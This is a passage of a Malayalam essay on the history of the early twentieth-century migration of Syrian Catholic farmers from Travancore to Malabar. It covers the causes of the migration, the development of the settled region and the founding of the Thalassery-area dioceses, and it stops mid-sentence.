മലബാര്‍ കുടിയേറ്റം: നാള്‍വഴിയും വര്‍ത്തമാനവും

നോബിള്‍ തോമസ് പാറയ്ക്കല്‍

“നിശ്ശൂന്യവും നിശബ്ദവുമായ വീടുകളുടെ ഇടയിലൂടെ കുത്തിമറിഞ്ഞൊഴുകുന്ന ഒരു നദിപോലെ ജനം നടന്നു. അവരുടെ മാറാപ്പുകെട്ടുകളും ബന്ധങ്ങളും തങ്ങളോട് ചേര്‍ത്തുപിടിക്കാന്‍ യത്നിച്ചുകൊണ്ട് . . .” (ആനന്ദ്, ഗോവര്‍ധന്‍റെ യാത്രകള്‍) 

“അലഞ്ഞുതിരിയുന്ന ഒരു അരമായനായിരുന്നു എന്‍റെ പിതാവ്” എന്ന് വിശ്വാസികളുടെ പിതാവിനെക്കുറിച്ച് ഓര്‍ത്തെടുക്കുന്ന പഴയനിയമഗ്രന്ഥഭാഗം നമുക്ക് സുപരിചിതമാണ്. അലഞ്ഞുതിരിഞ്ഞിരുന്ന പിതാവില്‍ നിന്ന് ദൈവത്തിന്‍റെ വാഗ്ദാനപ്രകാരം രൂപംകൊണ്ട ഇസ്രായേല്‍ജനവും അലച്ചിലിന്‍റെ സുഖദുഃഖങ്ങള്‍ അനുഭവിച്ചവരാണ്. ഈജിപ്തില്‍ നിന്ന് കാനാന്‍ദേശം തേടിയുള്ള യാത്രയില്‍ നാല്പത് സംവത്സരങ്ങളാണ് മരുഭൂമിയിലൂടെ ഇസ്രായേല്‍ അലഞ്ഞുതിരിഞ്ഞത്. ആത്മീയതയുടെ പൊരുള്‍തേടുന്നവര്‍ക്കാര്‍ക്കും അലച്ചിലിന്‍റെ നാള്‍വഴികള്‍ അന്യമല്ല. ആത്മീയതയുടെ അന്തര്‍രഹസ്യങ്ങളന്വേഷിച്ചുള്ള യാത്രകള്‍ ഈലോകവാസത്തിന്‍റെ നശ്വരതയിലേക്കും സ്വര്‍ലോകതീര്‍ത്ഥാടനത്തിന്‍റെ അനിവാര്യതയിലേക്കുമാണ് വിരല്‍ചൂണ്ടുന്നത്.

കുടിയേറ്റം ഒരു സാധാരണപ്രതിഭാസമാണെങ്കിലും മലബാര്‍ കുടിയേറ്റത്തിന് അതിന്‍റേതായ പ്രത്യേകതകളും വൈകാരികത തുളുമ്പുന്ന ഭാവസന്ദര്‍ഭങ്ങളും വിവരിക്കാനുണ്ട്. ഇന്ന്, കുടിയേറ്റാനന്തരമലബാറിന്‍റെ മണ്ണിലിരുന്നുകൊണ്ട് കുടിയേറ്റത്തിന്‍റെ ചരിത്രം തിരയുന്ന കുടിയേറ്റ കുടുംബങ്ങളിലെ പിډുറക്കാര്‍ അനുഭവിക്കുന്നത് നനവുള്ള ഗൃഹാതുരത്വമാണ്. ഒരു ജനതയുടെ ഐതിഹാസികമുന്നേറ്റമായ മലബാര്‍കുടിയേറ്റത്തിന്‍റെ ചരിത്രപശ്ചാത്തലവും പുരോഗതിയും ഭാവിപ്രതീക്ഷകളും അപഗ്രഥിക്കാനും വിലയിരുത്താനും വിഭാവനംചെയ്യാനുമുള്ള ശ്രമമാണിത്. കുടിയേറ്റകാലത്ത് സുറിയാനികത്തോലിക്കര്‍ക്കായി സ്ഥാപിക്കപ്പെട്ട തലശ്ശേരി അതിരൂപതയുടെയും രൂപതയുടെ ആദ്യഇടയനായ അഭിവന്ദ്യ സെബാസ്റ്റ്യന്‍ വള്ളോപ്പള്ളി പിതാവിന്‍റെയും അതിശക്തമായ പ്രവര്‍ത്തനസ്വാധീനങ്ങളും അവ മലബാറിന് നല്കിയ സമഗ്രപുരോഗതിയും കുടിയേറ്റചരിത്രത്തിന്‍റെ നട്ടെല്ലാണ്. ധീരമായ ആ കാല്‍വയ്പുകളുടെ പുണ്യംനിറഞ്ഞ ഓര്‍മ്മകളും ഈ പഠനത്തില്‍  സുവ്യക്തമായി നിഴലിക്കുന്നുണ്ട്.

1. കുടിയേറ്റത്തിന്‍റെ പശ്ചാത്തലം

കുടിയേറ്റം ഒരു ആഗോളപ്രതിഭാസമാണ്. കൃഷിക്കും തൊഴിലിനും സുരക്ഷിതത്വത്തിനുമെല്ലാമായി മനുഷ്യന്‍ താമസസ്ഥലം മാറാറുണ്ട്. അമേരിക്കന്‍ ഭൂഖണ്ഡവും യൂറോപ്യന്‍ നാടുകളുമെല്ലാം രൂപപ്പെടുന്നതിന്‍റെ പിന്നിലുള്ളത് ഇത്തരം ചരിത്രമാണ്. ഗോത്രവര്‍ഗ്ഗങ്ങളുടെ അധിനിവേശഫലങ്ങളാണ് മിക്ക ഒന്നാംലോകരാഷ്ട്രങ്ങളും. വാണിജ്യത്തിനും ലോകസഞ്ചാരത്തിനുമായി ഇറങ്ങിപ്പുറപ്പെട്ട യൂറോപ്യന്‍ ശക്തികള്‍ ക്രമേണ ലോകമെമ്പാടും കോളനികളുണ്ടാക്കുന്നതും താമസമാരംഭിക്കുന്നതും കുടിയേറ്റത്തിന്‍റെ മറ്റൊരു രൂപമാണ്. യുദ്ധം, മതപീഡനം, പ്രകൃതിക്ഷോഭങ്ങള്‍ ഇവയെല്ലാം ജനത്തെ പ്രവാസികളാക്കിത്തീര്‍ക്കുന്ന സ്വാഭാവികകാരണങ്ങളാണ്.  ഇന്ത്യയില്‍ ആദ്യമെത്തുന്ന യൂറോപ്യന്‍ശക്തി പോര്‍ച്ചുഗീസുകാരാണ്.  അവര്‍ രാജ്യത്തിന്‍റെ പശ്ചിമതീരം അവരുടെ കോളനിയാക്കി. ഇപ്രകാരം വിവിധതരം കൂടിയേറ്റങ്ങളുടെ രൂപരേഖകളാണ് ചരിത്രം നമുക്ക് ലഭ്യമാക്കുന്നത്.

കേരളത്തിനകത്തു തന്നെ നിരവധി കുടിയേറ്റങ്ങള്‍ക്ക് ചരിത്രം സാക്ഷ്യംവഹിച്ചിട്ടുണ്ട്. വര്‍ത്തമാനകാലകേരളത്തിന്‍റെ പിറവിക്കു മുമ്പ് മൂന്ന് നാട്ടുരാജ്യങ്ങളാണ് ഇവിടെ നിലനിന്നിരുന്നത്: തിരുവിതാംകൂര്‍, കൊച്ചി, മലബാര്‍. തിരുവിതാംകൂര്‍, കൊച്ചി എന്നിവ നാട്ടുരാജാക്കന്മാരുടെ ഭരണത്തിന്‍കീഴിലും മലബാര്‍ ബ്രിട്ടീഷുകാരുടെ നേരിട്ടുള്ള ഭരണത്തിലുമായിരുന്നു.  തിരുവിതാംകൂറിലെ പ്രധാനവും  ശക്തവുമായ ഇന്നത്തെ കോട്ടയം ജില്ലയില്‍നിന്നാണ് കുടിയേറ്റങ്ങള്‍ കൂടുതലും നടന്നിട്ടുള്ളത്. പത്തൊമ്പതാംനൂറ്റാണ്ടിന്‍റെ അവസാനദശകത്തിലും ഇരുപതാംനൂറ്റാണ്ടിന്‍റെ ആദ്യദശകങ്ങളിലുമായിട്ടാണ് കുടിയേറ്റങ്ങള്‍ മുഴുവന്‍തന്നെയും നടന്നത്. ആദ്യവര്‍ഷങ്ങളില്‍ മധ്യതിരുവിതാംകൂറില്‍നിന്നു കുട്ടനാട്ടിലേക്കും കിഴക്കന്‍ മലമ്പ്രദേശങ്ങളിലേക്കുമാണ് കുടിയേറ്റം നടന്നത്.  പിന്നീട് കോതമംഗംലം തൊടുപുഴ താലൂക്കുകളുടെ കിഴക്കന്‍ പ്രദേശങ്ങളിലേക്ക് മുവാറ്റുപുഴ താലൂക്കിന്‍റെ പടിഞ്ഞാറന്‍ പ്രദേശങ്ങളില്‍നിന്നും മീനച്ചില്‍ താലൂക്കില്‍ നിന്നും ധാരാളം ആളുകള്‍ കുടിയേറി. ദശകങ്ങള്‍ നീണ്ടുനിന്ന ഈ കുടിയേറ്റ പ്രക്രിയയെ മൂന്നു ഘട്ടങ്ങളായി മനസ്സിലാക്കാന്‍ എളുപ്പമാണ്: ഒന്നാംഘട്ട കുടിയേറ്റം നടന്നത് കോതമംഗംലം, തൊടുപുഴ താലൂക്കുകളില്‍ മാത്രമല്ല, മീനച്ചില്‍ താലൂക്കിന്‍റെ കിഴക്കന്‍ പ്രദേശങ്ങള്‍, ഇന്നത്തെ കാഞ്ഞിരപ്പള്ളി, പീരുമേട് താലൂക്കുകള്‍, പത്തനംതിട്ട താലൂക്കിലെ റാന്നി, പത്തനാപുരം താലൂക്കിലെ അഞ്ചല്‍, കുളത്തൂപ്പുഴ പ്രദേശങ്ങള്‍, നെയ്യാറ്റിങ്കര താലൂക്കിലെ അമ്പൂരി എന്നിവിടങ്ങളിലേക്കെല്ലാം കുടിയേറ്റമുണ്ടായി. രണ്ടാംഘട്ട കുടിയേറ്റമാണ് മലബാറിലേക്കു നടന്നത്. ഹൈറേഞ്ചിലേക്കുള്ള കുടിയേറ്റത്തെ മൂന്നാംഘട്ടം എന്നും വിശേഷിപ്പിക്കാം.

തിരുവിതാംകൂറിന്‍റെ കിഴക്കന്‍ മേഖലകളില്‍ ഭൂമി ലഭ്യമല്ലാതായ സാഹചര്യത്തിലാണ് ആളുകള്‍ മലബാര്‍കുടിയേറ്റത്തിന്‍റെ സാധ്യതകളെക്കുറിച്ച് സംസാരിച്ചുതുടങ്ങിയത്. ഇരുപതാംനൂറ്റാണ്ടിന്‍റെ ആദ്യദശകങ്ങളില്‍, ഏകദേശം 1920-കളില്‍, ആരംഭിച്ച മലബാര്‍ കുടിയേറ്റം പക്ഷേ, ഒരു ചെറിയ പ്രസ്ഥാനമായിരുന്നില്ല. ഒന്നോ രണ്ടോ കുടുംബങ്ങളുടെ യാത്രയിലാരംഭിച്ച അത് ലക്ഷക്കണക്കിനാളുകളുടെ പ്രവാഹമായിപ്പരിണമിക്കുകയാണുണ്ടായത്. അനൗദ്യോഗികകണക്കുകള്‍ പ്രകാരം അമ്പതുകൊല്ലംകൊണ്ട് ഏകദേശം അഞ്ചുലക്ഷത്തോളം പേര്‍ തിരുവിതാംകൂറില്‍ നിന്ന് മലബാറിന്‍റെ മലയോരങ്ങളിലേക്ക് തങ്ങളുടെ ജീവിതം പറിച്ചുനടുകയുണ്ടായി. ക്രമീകൃതമായ ഒരു രീതിയോ നേതൃത്വമോ ആദ്യകാലങ്ങളില്‍ അവര്‍ക്കുണ്ടായിരുന്നില്ല എന്നത് ശ്രദ്ധേയമാണ്. അതിന് അതിന്‍റേതായ ദോഷവശങ്ങളും ഉണ്ടായിരുന്നു. “രണ്ടും മൂന്നും കുടുംബങ്ങള്‍ വീതമുള്ള ചെറിയ സംഘങ്ങളുടെ ഒരു സംരംഭമായിരുന്നു മലബാര്‍കുടിയേറ്റം. അതുകൊണ്ടുതന്നെ പലപരാജയങ്ങളും അകാലമരണങ്ങളും സംഭവിച്ചു. സ്വമനസ്സാ പുറപ്പെട്ടു, സ്വമനസ്സാ വന്നുകയറി. ആയുസ്സും ആരോഗ്യവും നഷ്ടപ്പെടുത്തി. ആരെയും പഴിക്കുവാനില്ല.”  എങ്കിലും ആശ്രയിക്കുന്നവരില്‍ അലിവുള്ളവനായ ദൈവം കുടിയേറ്റകര്‍ഷകരുടെ വിലാപങ്ങള്‍ക്ക് ചെവിയോര്‍ത്തു എന്നതിനു തെളിവാണ് എല്ലാവിധത്തിലും സമ്പന്നമായ വര്‍ത്തമാനകാലമലബാര്‍. അഭിവന്ദ്യ വള്ളോപ്പള്ളി പിതാവ് മലബാര്‍ കുടിയേറ്റത്തെ വിലയിരുത്തുന്നതും ഇപ്രകാരമാണ്:

“ഇരുപതുകളുടെ ഉത്തരാര്‍ത്ഥത്തില്‍ ആരംഭിച്ച കുടിയേറ്റം ഇന്ന് തെങ്ങും കമുകും റബ്ബറും കുരുമുളകും നിറഞ്ഞ് ഹരിതാഭയണിഞ്ഞ മലയോരങ്ങളായി, മലയോരങ്ങളെ കോര്‍ത്തിണക്കുന്ന നിരവധി പാതകളായി, ചെറുപട്ടണങ്ങളായി, നിരവധി സ്ഥാപനങ്ങളായി വിരാജിക്കുന്നു. ദൈവകരങ്ങളില്‍ നിന്നും വലിയ നേട്ടങ്ങളുടെ ഈ നിധി സ്വീകരിച്ചപ്പോള്‍ പകരംകൊടുക്കേണ്ടിവന്ന വിലയും സഹിക്കേണ്ടിവന്ന കഷ്ടപ്പാടും എത്രയെന്ന് അധികമാരും ഇന്നറിയില്ല. ആയിരങ്ങളാണ് മലമ്പനിയുടെയും കാട്ടുമൃഗങ്ങളുടെയും മലമ്പാമ്പുകളുടെയും പ്രകൃതിക്ഷോഭങ്ങളുടെയും ഇരയായിട്ടുള്ളത്. മുമ്പേ പറന്ന ആ പക്ഷിക്കൂട്ടങ്ങളില്‍ ഒരൊറ്റ അംഗം പോലും അവശേഷിക്കാതെ അപമൃത്യുവിനിരയായ കുടുംബങ്ങള്‍ നിരവധിയുണ്ട്. എല്ലാം നഷ്ടപ്പെട്ടു നിരാശയില്‍ മടങ്ങിയവരും കുറവല്ല. അവരുടെ ദുഃഖങ്ങളാകുന്ന മൂശയിലാണ് സമ്പന്നമായ ഇന്നത്തെ മലബാറിനെ ദൈവം വാര്‍ത്തെടുത്തത്.”

1.1 കാരണങ്ങള്‍

പിറന്ന നാടും വേരുറപ്പിച്ച മണ്ണും കൈവിടാന്‍ വെറുമൊരു കൗതുകം കൊണ്ടു മാത്രം ആരും തയ്യാറാവുകയില്ല. അതിശക്തവും നിലനില്പിനെ അപകടത്തിലാക്കുന്നതുമായ കാരണങ്ങളാണ് ലോകചരിത്രത്തില്‍ എല്ലാ കുടിയേറ്റങ്ങള്‍ക്കും കാരണമായിട്ടുള്ളത്. കൂടുതല്‍ മെച്ചപ്പെട്ട ജീവിതസൗകര്യങ്ങള്‍, കൂടുതല്‍ ഭൂമി, കൂടുതല്‍ സ്വത്ത് എന്നിങ്ങനെയുള്ള ഭൗതികതാത്പര്യങ്ങളും കുടിയേറ്റത്തിന്‍റെ പ്രേരകശക്തികളാകാറുണ്ട്. മലബാറിലേക്കുള്ള കുടിയേറ്റത്തിന് പ്രേരിപ്പിച്ച കാരണങ്ങള്‍ ഏവയെന്ന് പരിശോധിക്കാം.

1.1.1 ജനസാന്ദ്രത:

തിരുവിതാംകൂറിലെ നസ്രാണികുടുംബങ്ങളധികവും കാര്‍ഷികവൃത്തികൊണ്ട് ഉപജീവനം കഴിച്ചിരുന്നവരായിരുന്നു. കര്‍ഷകരായിരുന്നെങ്കിലും അവര്‍ സ്വയംപര്യാപ്തരായിരുന്നു. ഓരോ കുടുംബത്തിലും ധാരാളം മക്കളും അവര്‍ക്കാവശ്യമായ സ്വത്തുമുണ്ടായിരുന്നു. എന്നാല്‍ കുടുംബസ്വത്ത് മക്കള്‍ക്ക് വിഭജിച്ചുകൊടുക്കുന്നതിലൂടെ കാലക്രമേണ ഭൂമിയെല്ലാം ചെറുതുണ്ടുകളായി മാറി. ധാരാളം ഭൂമിയുണ്ടായിരുന്ന കുടുംബങ്ങളെല്ലാം രണ്ടുമൂന്നു തലമുറകള്‍ കഴിഞ്ഞപ്പോള്‍ ഒന്നോ രണ്ടോ ഏക്കറുകള്‍ മാത്രം ഭൂമിയുള്ളവരായി മാറിപ്പോയി. ആണ്‍മക്കള്‍ക്ക് കൃഷിഭൂമിയും പെണ്‍മക്കള്‍ക്ക് ആഭരണങ്ങളുമാണ് പിതൃസ്വത്തായി കൊടുത്തുകൊണ്ടിരുന്നത്. എന്നാല്‍ തലമുറകള്‍ കഴിഞ്ഞപ്പോള്‍ വീതത്തിന്‍റെ അളവിലും സ്വാഭാവികമായ കുറവ് സംഭവിച്ചു. അങ്ങനെയാണ് കന്നിമണ്ണു തേടിയുള്ള യാത്രകള്‍ ആരംഭിച്ചത്. സര്‍ക്കാര്‍ ജോലിക്കും വ്യവസായത്തിനുമുള്ള സാധ്യതകളില്ലാതിരുന്ന കര്‍ഷകുടുംബങ്ങള്‍ കിഴക്കോട്ടും വടക്കോട്ടും നീങ്ങുകയും അങ്ങനെ ഹൈറേഞ്ചിലും മലബാറിലും കുടിയുറപ്പിക്കുകയും ചെയ്തു. തിരുവിതാംകൂറില്‍ ഒരേക്കര്‍ വിറ്റുകിട്ടുന്ന പണംകൊണ്ട് കുടിയേറ്റ സ്ഥലങ്ങളില്‍ അമ്പതും നൂറും ഏക്കര്‍ കിട്ടുമായിരുന്നു.

1.1.2 സാമ്പത്തികഞെരുക്കങ്ങള്‍:

നസ്രാണിക്രിസ്ത്യാനികള്‍ക്കിടയില്‍ ശ്രേഷ്ഠമായ പല പാരമ്പര്യങ്ങളും നിരവധി ആചാരങ്ങളും നിലനിന്നിരുന്നു. ജനനം, വിവാഹം, മരണം എന്നിവയോടു ബന്ധപ്പെട്ട ചടങ്ങുകള്‍ ഏറെയുണ്ടായിരുന്നു. പിള്ളയൂട്ട്, പുലകുളി, ശ്രാദ്ധം, വിവാഹവിരുന്നുകള്‍ തുടങ്ങിയ ആഘോഷങ്ങള്‍ ഏറെ പണച്ചിലവുള്ളവയും അഭിമാനപ്രശ്നവുമായിരുന്നു. ഏതുവിധേനയും ഇവയെല്ലാം മോടിപിടിപ്പിക്കാന്‍ പരിശ്രമിച്ച കുടുംബങ്ങള്‍ ഹുണ്ടികക്കാരോട് കൊള്ളപ്പലിശയ്ക്ക് കടംവാങ്ങുകയും വസ്തുവകകള്‍ പണയംവയ്ക്കുകയും ചെയ്തു. അക്കാലത്ത് നിലവിലിരുന്ന ജപ്തിമാര്‍ഗ്ഗങ്ങള്‍ വളരെ എളുപ്പമായിരുന്നതിനാല്‍ പലര്‍ക്കും പണയംവച്ച വസ്തുവകകള്‍ തിരിച്ചെടുക്കാന്‍ കഴിഞ്ഞില്ല. ഇതുകൂടാതെ ചിട്ടികള്‍ നടത്തിയും വ്യവഹാരങ്ങള്‍ നടത്തിയും വലിയ സാമ്പത്തികബാദ്ധ്യതകള്‍ വരുത്തിവച്ചവര്‍ വേറെയുമുണ്ടായിരുന്നു. ഇവരെല്ലാം ക്രമേണ കുടിയേറ്റത്തിലൂടെ പുതിയൊരു ജീവിതം കെട്ടിപ്പടുക്കാമെന്ന സ്വപ്നം കാണുന്നവരായിമാറി.

1.1.3 ദിവാന്‍ഭരണത്തിലെ സ്ഥാപിതതാത്പര്യങ്ങള്‍:

തിരുവിതാംകൂര്‍ രാജാവായിരുന്ന ശ്രീചിത്തിരിതിരുനാള്‍ ബാലരാമവര്‍മ്മ 1936-ല്‍ സര്‍ സി.പി. രാമസ്വാമി അയ്യരെ ദിവാനായി നിയമിച്ചു. അസാധാരണ ബുദ്ധിശക്തിയും ഭരണപാടവുമുള്ളയാളായിരുന്നു. താരതമ്യേന സമ്പന്നമായിരുന്ന ക്രൈസ്തവസമുദായത്തെ നിയന്ത്രിക്കാന്‍ അദ്ദേഹം ശ്രമിച്ചു. അതിനുവേണ്ടി നിയമനിര്‍മ്മാണങ്ങളും നയപരമായ നീക്കങ്ങളും നടത്തി. ഭൂരിഭാഗം ക്രൈസ്തവരുടെയും സാമ്പത്തികനിക്ഷേപങ്ങള്‍ സൂക്ഷിച്ചിരുന്ന ക്രൈസ്തവരുടെ തന്നെ ഉടമസ്ഥതയിലുള്ള നാഷണല്‍ ആന്‍റ് ക്വയിലോണ്‍ ബാങ്ക് 1938-ല്‍ ദിവാന്‍ പൂട്ടിമുദ്രവച്ചു. കൃഷിക്കാര്‍ക്കുമേല്‍ ഭാരമേറിയ നികുതികളും ബാദ്ധ്യതകളും ചുമത്തി. സ്വന്തം വയലില്‍നിന്ന് നെല്ലെടുക്കാന്‍ വില്ലേജ് ഓഫീസറുടെ അനുമതി നേടേണ്ട സ്ഥിതിവന്നു. വിളവുകളുടെ വലിയൊരു ഭാഗം നികുതിയായി പിടിച്ചെടുത്തു. “വൃക്ഷക്കരം”, “കുലകൂടുതല്‍” എന്നിവ പ്രത്യേകം നികുതിയിനങ്ങളായിരുന്നു. നൂറു തേങ്ങായ്ക്ക് രണ്ടുരൂപ മാത്രം വിലയുണ്ടായിരുന്ന അക്കാലത്ത് ഭൂനികുതിയും കാര്‍ഷികനികുതികളും അടയ്ക്കുക എന്നത് കര്‍ഷകര്‍ക്ക് ഏറെ ദുഷ്കരമായിത്തീരുകയും നാടുവിട്ടു പോകുന്നതിനേക്കുറിച്ചുള്ള ചിന്തകള്‍ അവരുടെ മനസ്സില്‍ ശക്തമാവുകയും ചെയ്തു.

1.1.4 രണ്ടാംലോകമഹായുദ്ധത്തിന്‍റെ സ്വാധീനവും കെടുതികളും:

രണ്ടാം ലോകമഹായുദ്ധം 1939-ല്‍ ആരംഭിച്ചുവെങ്കിലും അതിന്‍റെ കെടുതികള്‍ ഭാരതത്തിലനുഭവപ്പെടാനാരംഭിച്ചത് ജപ്പാന്‍ യുദ്ധത്തില്‍ ചേര്‍ന്നതോടെയാണ്. 1942-ല്‍ ജപ്പാന്‍ യുദ്ധത്തില്‍ ചേരുകയും ബര്‍മ്മയുള്‍പ്പെടെയുള്ള (മ്യാന്‍മര്‍) കിഴക്കന്‍ രാജ്യങ്ങള്‍ അവരുടെ കൈപ്പിടിയിലാവുകയും ചെയ്തു. കേരളീയരുടെ ആഹാരമായിരുന്ന അരി മുഖ്യമായും എത്തിയിരുന്നത് ബര്‍മ്മയില്‍നിന്നായിരുന്നു. ജപ്പാന്‍ ബര്‍മ്മ പിടിച്ചെടുത്തതോടെ കേരളത്തിലേക്കുള്ള അരിയുടെ വരവ് ഇല്ലാതായി. അത് രൂക്ഷമായ ഭക്ഷ്യക്ഷാമത്തിലേക്ക് നയിച്ചു. നാണയപ്പെരുപ്പം, പട്ടിണി, രോഗം, സാമൂഹ്യാവസ്ഥകള്‍ എന്നിവയെല്ലാം യുദ്ധത്തിന്‍റെ ഉപോത്പന്നങ്ങളായി. തിരുവിതാംകൂര്‍ ഗവണ്‍മെന്‍റ് ഭക്ഷ്യസാധനങ്ങള്‍ക്ക് റേഷന്‍ ഏര്‍പ്പെടുത്തിയെങ്കിലും ലഭ്യമായിരുന്നത് കേരളീയര്‍ക്ക് ഉപയോഗപ്രദമല്ലാത്ത ബജറയും മെയ്സുമായിരുന്നു. അതിനാല്‍ എല്ലാവരും അരിക്കുപകരം അന്നു ലഭ്യമായിരുന്ന കപ്പ ഭക്ഷിക്കാന്‍ നിര്‍ബന്ധിതരായിത്തീര്‍ന്നു. കപ്പയുടെ ഉപയോഗവും വിലയും വര്‍ദ്ധിക്കുകയും മലബാറില്‍ കപ്പകൃഷി വ്യാപകമാവുകയും ചെയ്തു. മലബാറിലെ കന്നിമണ്ണില്‍ കപ്പയും ഇഞ്ചിയും വാഴയും നെല്ലുമെല്ലാം നുറുമേനി വിളവ് നല്കിയിരുന്നു. കപ്പയും മറ്റ് കാര്‍ഷികവിഭവങ്ങളും വലിയ സാമ്പത്തികനേട്ടം നേടിത്തന്നപ്പോള്‍ കൂടുതല്‍പേര്‍ മലബാറിന്‍റെ മണ്ണിനോട് മോഹമുള്ളവരായിത്തീര്‍ന്നു.

മലബാര്‍ കുടിയേറ്റം കേരളചരിത്രത്തില്‍ വേണ്ടത്ര പ്രാധാന്യം നേടിയിട്ടില്ല എന്നുതന്നെ പറയാം. എന്നാല്‍ സുറിയാനിക്രിസ്ത്യാനികളെയും മലബാറിലെ ഇന്നത്തെ വിശ്വാസികളെയും സംബന്ധിച്ചിടത്തോളം അത് അതിപ്രധാനവും ദൈവകരം പിടിച്ച് കാനാന്‍ദേശം ലക്ഷ്യമാക്കിയുള്ള  മഹത്തായ ഒരു പുറപ്പാടുമായിരുന്നു. മലബാര്‍ കുടിയേറ്റത്തിന്‍റെ ചരിത്രം വിശ്വാസതീര്‍ത്ഥാടനത്തിന്‍റെ ചരിത്രമാണ്. ബാഹ്യമായ കാരണങ്ങള്‍ നിരവധിയുണ്ടെങ്കിലും മലബാറിന്‍റെ മലമടക്കുകള്‍ക്കപ്പുറത്ത് നിന്ന് ദൈവത്തിന്‍റെ വിളി കിട്ടിയവരാണ് തിരുവിതാംകൂറിന്‍റെ സാങ്കല്പികസംരക്ഷണം വിട്ടുപേക്ഷിക്കാന്‍ തയ്യാറായത്. മുകളില്‍ വിവരിച്ച കാരണങ്ങളെല്ലാംതന്നെ ലോകത്തില്‍ നിറഞ്ഞ് അതിനെ കീഴടക്കാന്‍ കല്പിച്ച സര്‍വ്വശക്തനായ ദൈവം നല്കിയ ശക്തമായ വിളിയും ഉള്‍പ്രേരണയുമായി തിരിച്ചറിയാനും മനസ്സിലാക്കാനും ഇന്ന് നമുക്ക് നമുക്ക് സാധിക്കും.

2. കുടിയേറ്റഭൂമി പുരോഗമനത്തിലേക്ക്

കുടിയേറ്റഭൂമിയായ മലബാറിന്‍റെ പുരോഗമനം അതിവേഗം സംഭവിച്ചു. വര്‍ദ്ധിച്ചതോതിലുള്ള കുടിയേറ്റം മലബാര്‍പ്രദേശത്തിന്‍റെ ഒരു നവോത്ഥാനത്തിനുതന്നെ തുടക്കം കുറിക്കുകയാണ് ചെയ്തത്. 1930-35 കാലഘട്ടത്തില്‍ കുടിയേറിയവര്‍ക്ക് വളരെയേറെ പ്രതിസന്ധികള്‍ തരണം ചെയ്യേണ്ടതുണ്ടായിരുന്നു. അസുഖങ്ങളും കാട്ടുമൃഗങ്ങളും പ്രതികൂലമായ കാലാവസ്ഥയും അനേകരുടെ ജീവനെടുത്തു. 1960 ആയപ്പോഴേക്കും കുടിയേറ്റ കുടുംബങ്ങളുടെ എണ്ണം വര്‍ദ്ധിക്കുകയും അവരഭിമുഖീകരിച്ചിരുന്ന പ്രയാസങ്ങള്‍ കുറയുകയും ചെയ്തു. “മലബാറിലെ ആദിവാസികളായ കൃഷിപ്പണിക്കാര്‍ക്കും കൂലിപ്പണിക്കാര്‍ക്കുമെല്ലാം കുടിയേറ്റക്കാരുടെ ആഗമനം ആനന്ദദായകമായിരുന്നു. അക്ഷരാഭ്യാസവും ആരോഗ്യസംരക്ഷണവും അവര്‍ക്കു ലഭ്യമായി. ജാതിവ്യത്യാസമോ വര്‍ണ്ണവ്യത്യാസമോ നോക്കാതെ ഹരിജനങ്ങളുടെയും ഗിരിജനങ്ങളുടെയും അഭിവൃദ്ധിക്കുവേണ്ടി കുടിയേറ്റക്കാര്‍ ബുദ്ധിമുട്ടി.”  മലയോരപ്രദേശങ്ങളിലെ ജനങ്ങളുടെ ജീവിതരീതിയിലും കൃഷിരീതിയിലുമെല്ലാം തന്നെ മാറ്റങ്ങള്‍ വരുത്താന്‍ കുടിയേറ്റപ്രസ്ഥാനത്തിന് സാധിച്ചിരുന്നു. കെ.കെ.എന്‍. കുറുപ്പ് രേഖപ്പെടുത്തുന്നു:

ക്രിസ്ത്യാനികളായ കുടിയേറ്റക്കാര്‍ ഇവിടുത്തെ മലയോരങ്ങളില്‍ ഒരു “ഹരിതവിപ്ലവ”ത്തിന്‍റെ ആരംഭം കുറിച്ചു. പുതിയ സങ്കരയിനം കുരുമുളകുവള്ളികള്‍ പ്രചരിപ്പിച്ചത് അവരായിരുന്നു. ക്രിസ്ത്യാനികളെ പൊതുവെ വിളിച്ചുവരുന്ന ചേട്ടന്‍ എന്ന പേരില്‍ ഈ വള്ളിയും അറിയപ്പെട്ടു. പള്ളി തുടങ്ങിയസ്ഥാപനങ്ങള്‍ കര്‍ഷകര്‍ക്ക് ആവശ്യമായ പരിശീലനം കൊടുക്കുന്നതിലും താത്പര്യം കാണിച്ചു.

തിരുവിതാംകൂറില്‍ നിന്നുള്ള കര്‍ഷകകുടിയേറ്റം കേരളത്തിനുള്ളില്‍ മാത്രം ഒതുങ്ങി നിന്നിരുന്നില്ല. കര്‍ണ്ണാടക, തമിഴ്നാട് സ്റ്റേറ്റുകളിലേക്കും അത് വ്യാപിച്ചു. 1955 ഏപ്രില്‍ 29-ന് തലശ്ശേരി അതിരൂപതയുടെ വ്യാപ്തി ചിക്കമംഗലൂര്‍, ഷിമോഗ, ഊട്ടി, മൈസൂര്‍ മംഗലാപുരം എന്നീ ലത്തീന്‍ രൂപതകളുടെ പ്രദേശങ്ങള്‍ കൂടി ഉള്‍പ്പെടുത്തിക്കൊണ്ട് പൗരസ്ത്യതിരുസംഘം ഡിക്രി പുറപ്പെടുവിച്ചു.  ദ്രുതഗതിയില്‍ വികസിച്ച മലബാര്‍ കുടിയേറ്റ മേഖലയില്‍ തലശ്ശേരി രൂപതയുടെ വിഭജനം ഏതാനും വര്‍ഷങ്ങള്‍ക്കുള്ളില്‍ത്തന്നെ അനിവാര്യമായിത്തീര്‍ന്നു. 1970 ജൂണ്‍ 20-ന് പാലക്കാട് രൂപത സ്ഥാപിതമാവുകയും തലശ്ശേരി രൂപതയുടെ കീഴിലുണ്ടായിരുന്ന പള്ളികളും സ്ഥാപനങ്ങളും അതിലേക്ക് ലയിക്കുകയും ചെയ്തു. 1973 മാര്‍ച്ച് 1-ന് മാനന്തവാടി രൂപത സ്ഥാപിതമായി. ഷിമോഗ, ചിക്കമംഗലൂര്‍, ഹസ്സന്‍, മാണ്ഡ്യ, മൈസൂര്‍, നീലഗിരി ജില്ലകളും  കണ്ണൂര്‍-മലപ്പുറം ജില്ലകളിലെ ഏതാനും പ്രദേശങ്ങളും (കൊട്ടിയൂര്‍, മണിമൂളി) ഉള്‍പ്പെട്ടതായിരുന്നു അന്നത്തെ മാനന്തവാടി രൂപത. തലശ്ശേരി രൂപത വീണ്ടും വിഭജിക്കപ്പെടുകയും 1986 ഏപ്രില്‍ 28-ന് താമരശ്ശേരി രൂപത സ്ഥാപിക്കപ്പെടുകയും ചെയ്തു. പിന്നീട് 1999-ല്‍ കര്‍ണ്ണാടകയില്‍ തലശ്ശേരി രൂപതയുടേതായി ശേഷിച്ചിരുന്ന പ്രദേശങ്ങള്‍ ഉള്‍പ്പെടുത്തി ബല്‍ത്തങ്ങാടി രൂപതയും സ്ഥാപിതമായി. മാനന്തവാടി 